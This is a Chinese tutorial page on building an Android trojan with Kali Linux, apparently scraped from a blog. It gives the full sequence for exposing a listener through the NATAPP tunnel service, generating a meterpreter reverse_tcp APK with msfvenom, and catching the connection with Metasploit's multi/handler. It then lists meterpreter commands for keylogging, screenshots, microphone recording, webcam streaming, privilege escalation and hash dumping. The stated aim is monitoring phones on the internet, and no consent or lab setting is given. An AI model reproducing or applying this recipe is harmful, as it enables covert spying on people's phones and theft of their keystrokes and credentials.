| Kali之安卓木马 | 您所在的位置:网站首页 › kali 安卓兔杀木马 passphrase › Kali之安卓木马 |
Kali之安卓木马
|
Kali linux初体验
Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下: 实现内网穿透Metasploit木马操作 一、实现内网穿透 进入 https://natapp.cn/,根据提示注册并创建免费隧道
进入
https://natapp.cn/#download下载linux的客户端
命令行内启动natapp。语句: ./natapp -authtoken=************ 后面的星号换成自己的authtoken口令(如果提示权限不够 chmod a+x natapp )
得到服务器地址。ping 一下第一个圈内的服务器。得到ip地址是xxx.x.xx.x 后面位端口号:34611
二、Metasploit木马操作
5.生成木马APP。然后输入命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=服务器的ip(上面ping服务器得到的ip) LPORT=34611(上面服务器的端口号) R > /root/apk.apk
34611是设置的端口,显示这个说明已经生成木马成功了,如图: 6.启动msf。msfconsole 然后输入命令: use exploit/multi/handler //加载模块 set payload android/meterpreter/reverse_tcp //选择Payload 修改ip与端口 set LHOST 127.0.0.1 //这里的地址设置成NATAPP中配置的本地ip set LPORT 2018 //这里的地址设置成NATAPP中配置的本地端口 exploit //开始监听等待木马响应下面是一些木马的常用命令: enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表) getdesktop -->得到当前的Meterpreter桌面 idletime -->返回秒远程用户已经闲置数量 keyscan_dump -->转储按键缓冲(下载键盘记录) keyscan_start -->开始捕获击键(开始键盘记录) keyscan_stop -->停止捕获击键(停止键盘记录) screenshot -->抓取交互式桌面截图(当前操作界面截图一张) setdesktop -->改变meterpreters当前桌面 uictl -->控制一些用户界面组件(获取键盘、鼠标控制权) 使用uictl -h 查看帮助(打开/关闭,键盘/鼠标) PS:键盘记录注意点,先开始,后下载,再结束,否则会出错 摄像头:Stdapi: Webcam Commands(摄像头命令) record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制) webcam_chat -->开始视频聊天(视频,对方会有弹窗) webcam_list -->单摄像头(查看摄像头列表) webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片) webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控) 其他命令操作 getsystem -->获取高权限 hashdump -->获取当前用户hash |
【本文地址】
公司简介
联系我们